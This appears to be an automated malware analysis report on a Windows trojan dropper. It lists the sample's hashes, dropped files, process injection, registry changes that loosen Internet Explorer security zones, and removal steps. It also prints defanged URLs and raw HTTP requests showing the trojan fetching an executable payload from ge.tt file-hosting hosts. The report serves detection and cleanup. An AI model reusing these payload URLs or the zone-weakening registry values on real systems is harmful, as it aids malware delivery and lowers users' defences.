Trojan.Generic.12510469_e47ea82610
Trojan-Dropper.MSIL.Agent.auia (Kaspersky), Trojan.Generic.12510469 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: e47ea8261099c8ee573d946443857d5a
SHA1: 702ec12f7b32710158f075c2b83e15120af2a389
SHA256: 87e1703feabf2e1396dc8d46902ce8988375c7615f0ca5626d73bc37cba8d38b
SSDeep: 24576:BbtRvf3U1XjwG7vOp xu0TZib o Ev3z9:pLvf3U1XjwmOp xxt 3z9
Size: 832512 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2015-01-05 19:49:31
Analyzed on: WindowsXPESX SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
59t6pc.exe:516
The Trojan injects its code into the following process(es):
%original file name%.exe:1960
rundll32.exe:1908
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
RasPbFile
ShimCacheMutex
File activity
The process %original file name%.exe:1960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\59t6pc.exe (12348 bytes)
The process 59t6pc.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\59t6pc.png (25 bytes)
Registry activity
The process %original file name%.exe:1960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 04 3F 2E FE 02 BE AD 64 C6 01 45 F0 62 1D 7B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1]
"Temp/59t6pc.exe" = "59t6pc"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that do not belong to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process 59t6pc.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 F6 D8 0A 8A 8F EA 05 27 ED F8 25 A4 E7 F6 CD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"shimgvw.dll" = "Windows Picture and Fax Viewer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process rundll32.exe:1908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 97 29 AC 15 FB EC 7B 4D 17 68 4F 71 6A FD 51"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
| MD5 | File path |
|---|---|
| 6f4d1438086f26c2ceed46d54cbed5ae | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\59t6pc.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: NVIDIA Corporation
Product Name: Service
Product Version: 1.4.3.0
Legal Copyright: Microsoft Coprporation (c) 2014
Legal Trademarks: Image
Original Filename: ScreenViewer.exe
Internal Name: ScreenViewer.exe
File Version: 1.4.3.0
File Description: Screenshotter
Comments: Image Viewer
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 691924 | 692224 | 5.454 | f757594d8ad40120173c358097dc5365 |
| .sdata | 704512 | 319 | 512 | 2.46306 | bc701e95eeecc372f9de607e04482765 |
| .rsrc | 712704 | 137920 | 138240 | 0.952197 | 189b3e4b3fa66f24a59e4db8b7402cc1 |
| .reloc | 851968 | 12 | 512 | 0.070639 | ade4bab60785daa998bd2a26264475fc |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://ge.tt/api/1/files/85wK5182/0/blob?download | |
| hxxp://open.ge.tt/1/files/85wK5182/0/blob?download | |
| hxxp://ec2-54-228-6-8.eu-west-1.compute.amazonaws.com/streams/85wK5182/231231243513.exe?sig=-Ur3PHKNfynjS3fJIFyxH-1d28l6cXEqFxA&type=download | |
| hxxp://w056556.blob4.ge.tt/streams/85wK5182/231231243513.exe?sig=-Ur3PHKNfynjS3fJIFyxH-1d28l6cXEqFxA&type=download | |
| hxxp://w428894.open.ge.tt/1/files/85wK5182/0/blob?download | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
GET /api/1/files/85wK5182/0/blob?download HTTP/1.1
Host: ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://w428894.open.ge.tt/1/files/85wK5182/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
GET /streams/85wK5182/231231243513.exe?sig=-Ur3PHKNfynjS3fJIFyxH-1d28l6cXEqFxA&type=download HTTP/1.1
Host: w056556.blob4.ge.tt
Connection: Keep-Alive
HTTP/1.1 200 OK
date: Sat, 17 Jan 2015 09:18:08 GMT
last-modified: Mon, 05 Jan 2015 17:37:38 GMT
etag: "3742e2634ee802968c7e307bc1563cab-1"
accept-ranges: bytes
content-type: application/x-msdownload
content-length: 457216
server: gbs
access-control-allow-origin: *
content-disposition: attachment
Connection: keep-alive
<<< skipped >>>
GET /1/files/85wK5182/0/blob?download HTTP/1.1
Host: w428894.open.ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://w056556.blob4.ge.tt/streams/85wK5182/231231243513.exe?sig=-Ur3PHKNfynjS3fJIFyxH-1d28l6cXEqFxA&type=download
connection: keep-alive
transfer-encoding: chunked
The Trojan connects to the servers at the following location(s):
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
59t6pc.exe:516
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\59t6pc.exe (12348 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\59t6pc.png (25 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.